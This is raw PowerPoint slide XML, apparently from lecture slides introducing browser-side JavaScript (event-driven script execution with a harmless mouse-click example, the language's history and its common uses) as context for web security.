              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reply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281728A-C6D7-7246-88EE-C2118FCC5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Browser and Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898AE998-0FD6-894E-9E74-A4EAE9F9AE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87493" y="4109353"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD3EBFC-F45B-8B4D-B703-20E21ACAA7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82982" y="1761268"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92FB850-1D99-C14A-85DA-4E7B1442CE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02146" y="2727776"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3705EA20-EC91-F343-8D46-DAEA3427D6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74328" y="4266119"/>
            <a:ext cx="117565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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>network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C0112C-B67F-F540-A5DF-BA7FEFA8F789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990533" y="5742099"/>
            <a:ext cx="59795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C00000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>This is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> system!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2726224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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16FA33A-67A1-AE49-B323-06BC71A2DB4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Event-Driven Script Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09BE9FCB-CEED-564B-9C94-779BE39E16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5000" y="1828800"/>
            <a:ext cx="8178800" cy="38204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742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>     function </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>whichButton</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>(event) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>		if (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>event.button</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>==1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>			alert("You clicked the left mouse button!") }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>		else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>			alert("You clicked the right mouse button!") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t> 		}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>onmousedown</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0" err="1"/>
              <a:t>whichButton</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>(event)"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2400" kern="0" dirty="0"/>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783C0055-20FA-7D40-B5EB-EF4B340D50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83529" y="4125691"/>
            <a:ext cx="3096986" cy="719812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA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 type="none" w="lg" len="med"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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Function gets executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="60000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>when some event happens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0092F1C-8AB9-7B47-84D1-749A30720BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410202" y="2057400"/>
            <a:ext cx="1506536" cy="3429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stealth" w="lg" len="lg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" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB2770B1-704B-F347-8E53-C9B7B24C56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16737" y="2014194"/>
            <a:ext cx="2570163" cy="719812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA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 type="none" w="lg" len="med"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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Script defines a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="60000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>page-specific function </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F4513E4-AC2A-0B4D-95FE-66A5C398CFA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978727" y="4833715"/>
            <a:ext cx="533400" cy="304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stealth" w="lg" len="lg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3495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ectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7203729A-66E4-4139-B3DB-CECEF6DA52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448B0185-BF60-40FC-A3B6-BF883AD4E7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75FF99E5-A26E-4AC8-AA09-A9F829E3AE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3794" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF27A27-1BBF-3843-A479-115B6FA06C0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23619" y="891241"/>
            <a:ext cx="3939084" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r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8A5AEE14-4971-4A17-9134-2678A90F29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79078" y="2057401"/>
            <a:ext cx="0" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="line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795" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7BD20E-EB9D-BC4E-B1D4-65212FA7DF2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5300811" y="891241"/>
            <a:ext cx="5967361" cy="5075519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“The world’s most misunderstood programming language”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Language executed by the Web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Scripts are embedded in webpages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can run before HTML is loaded, before page is viewed, while it is being viewed, or when leaving the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Used to implement “active” webpages and Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A (potentially malicious) webpage gets to execute some code on user’s machine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F60BC6C0-6529-6F48-98D5-7E1835287407}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5189657" y="4861234"/>
              <a:ext cx="5967360" cy="12114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F60BC6C0-6529-6F48-98D5-7E183528740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154017" y="4825594"/>
                <a:ext cx="6039000" cy="1283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2896214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22" name="Rectangle 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB949D8D-8E17-4DBF-BEA8-13C57BF638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823" name="Rectangle 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC6FC45-D4D9-4025-91DA-272D318D37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4393" y="237744"/>
            <a:ext cx="7652977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4824" name="Rectangle 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA284212-C175-4C82-B112-A5208F70C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3809" y="393365"/>
            <a:ext cx="7328969" cy="6059273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818" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB20BB3F-8948-1F45-BBB2-16209EC7F80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68680" y="642593"/>
            <a:ext cx="6281928" cy="1744183"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>JavaScript History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB3AEF5C-8DAC-3941-B7F2-4D8C2E6734B5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68680" y="2153057"/>
            <a:ext cx="6804098" cy="4221675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Developed by Brendan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Eich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> at Netscape </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Scripting language for Navigator 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Later standardized for browser compatibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ECMAScript Edition 3 (aka JavaScript 1.5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Related to Java in name only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Name was part of a marketing deal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“Java is to JavaScript as car is to carpet”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Various implementations available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SpiderMonkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>RhinoJava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 5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E5786719-2F70-F447-9AB0-3170F3CCFB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16242" y="1334924"/>
            <a:ext cx="3322121" cy="4189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25448486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2" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034097D9-40D9-E748-853C-DD30108C82A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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Common Uses of JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7CE63E-7C6C-1045-B8E6-3C919FAB8248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963691" y="1000370"/>
            <a:ext cx="5845822" cy="4857262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altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Page embellishments and special effects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Dynamic content manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Form validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
